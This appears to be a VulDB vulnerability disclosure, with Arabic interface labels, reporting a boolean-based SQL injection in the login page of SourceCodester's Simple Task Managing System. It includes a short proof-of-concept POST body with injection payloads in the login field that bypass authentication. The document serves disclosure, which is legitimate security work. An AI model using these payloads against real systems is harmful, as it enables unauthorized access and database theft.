| عنوان | Simple Task Managing System in PHP With MySQLi Sql Injection |
|---|
| الوصف | The Simple Task Managing System in PHP With MySQLi (https://www.sourcecodester.com/php/15624/simple-task-managing-system-php-mysqli-free-source-code.html) is a simple web system coded in a PHP programming language.
The vulnerability allows unauthorized attacker to dump data from Mysql database.
POC:
POST /loginVaLidation.php
with body data
`login=foo'or 1#&password=123456`
the response headers contains `Location: index.php`
and with data
`login=foo'or 0#&password=123456`
the response headers contains `Location: login.php`
which leads to boolean based sql injection, and allows attacker to bypass the authorization of the system |
|---|
| المستخدم | kingbridge (UID 31583) |
|---|
| ارسال | 27/08/2022 05:55 AM (4 سنوات منذ) |
|---|
| الاعتدال | 27/08/2022 10:40 AM (5 hours later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 207423 [SourceCodester Simple Task Managing System /loginVaLidation.php تسجيل دخول حقن SQL] |
|---|
| النقاط | 17 |
|---|